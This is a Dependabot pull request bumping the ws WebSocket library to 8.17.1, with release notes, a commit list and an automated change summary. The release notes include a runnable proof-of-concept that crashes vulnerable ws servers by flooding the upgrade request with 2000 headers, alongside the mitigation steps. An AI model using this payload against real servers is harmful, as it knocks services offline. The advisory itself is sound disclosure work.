Bump ws from 8.14.1 to 8.17.1

[dependabot[bot]]

Bumps ws from 8.14.1 to 8.17.1.

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';

  if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits

• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• 934c9d6 [ci] Test on node 22
• 1817bac [ci] Do not test on node 21
• 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
• e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
• Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

---

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/brave/brave-variations/network/alerts).

[github-actions[bot]]

[puLL-Merge] - websockets/ws@8.14.1..8.17.1

Description

This PR involves multiple changes across the codebase aimed at updating and enhancing various components of the WebSocket library. The main changes include:

• Migration from .eslintrc.yaml to eslint.config.js for ESLint configuration.
• Updating Node.js versions supported in CI, adding version 22.
• Enhancing documentation and README for better clarity.
• Adding new configurations and functionalities in the WebSocket server and receiver.
• Version bump for ESLint and related dependencies.
• Addition of automated funding via Ethereum in FUNDING.json.

Possible Issues

1. Backward Compatibility: Changes in the way events are handled (allowSynchronousEvents) and deprecating old opt-in performance methods might affect users who depend on the old behavior.
2. Version Specific Code: The use of features like setImmediate and Node.js version checks might not work as expected in all environments. Thorough testing across versions is needed.

Security Hotspots

1. Ethereum Address in FUNDING.json: Ensure the provided Ethereum address is secure and properly managed to avoid potential abuse.
2. Upgrade Header Handling: Changes in upgrade header handling should be carefully reviewed to prevent potential vulnerabilities from improper header parsing.

Changes

### Changes #### Configuration Files - **.eslintrc.yaml** - Deleted. - **eslint.config.js** - New file added with updated ESLint configuration. - **.github/workflows/ci.yml** - Added Node.js version 22 to the matrix. - Updated `actions/setup-node` to version 4. #### Documentation - **README.md** - Improved clarity on opt-in performance and legacy opt-in strategies. - Updated warning about browser compatibility. - Added clearer instructions and formatting improvements throughout the document. - **SECURITY.md** - Minor grammatical improvements for readability. - **doc/ws.md** - Added new options like `allowSynchronousEvents` and `autoPong` to the WebSocketServer class. - Clarified existing options and added more details where necessary. #### Core Library - **lib/receiver.js** - Replaced `promise` based microtask handling with `setImmediate` for deferring events. - Introduced a `_errored` flag to track errors. - Refactored error handling into a `createError` method. - Added support for `allowSynchronousEvents` option. - **lib/sender.js** - Implemented a random pool for masking keys to optimize performance. - **lib/websocket-server.js** - Added default values for `allowSynchronousEvents` and `autoPong` options. - Improved handshake header validation. - **lib/websocket.js** - Added `_autoPong` property. - Enhanced socket settings configuration during upgrade process. #### Testing - **test/create-websocket-stream.test.js** - Updated to use `getDefaultHighWaterMark` if available for stream tests. - **test/receiver.test.js** - Added test cases for `allowSynchronousEvents` and event handling without swallowing errors. - **test/websocket-server.test.js** - Added tests for `autoPong` functionality. - Added tests for handling improper upgrade header values. - **test/websocket.test.js** - Matching behavior changes for `autoPong` and stream high water mark. #### Miscellaneous - **package.json** - Version bump for the package. - Updated dependencies for ESLint, Prettier, and other development tools. The extensive updates ensure that the library remains robust, performant, and easier to maintain, with improved developer experience through enhanced testing, documentation, and configuration management.